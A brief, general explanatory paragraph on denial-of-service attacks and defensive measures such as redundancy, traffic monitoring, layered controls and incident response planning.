DoS attacks emphasize the importance of availability as a critical aspect of security. Organizations implement proactive measures such as redundancy, monitoring, traffic analysis, and cloud-based protections to prevent disruption. DoS demonstrates how attackers can exploit system limits to degrade or halt operations. Effective defense requires layered solutions combining technical controls, operational planning, and real-time detection. Mitigation strategies include preparing incident response, deploying resilient infrastructure, and continuously monitoring systems to detect abnormal traffic patterns. DoS attacks underscore the need for robust, comprehensive measures to protect network and system availability against deliberate disruption.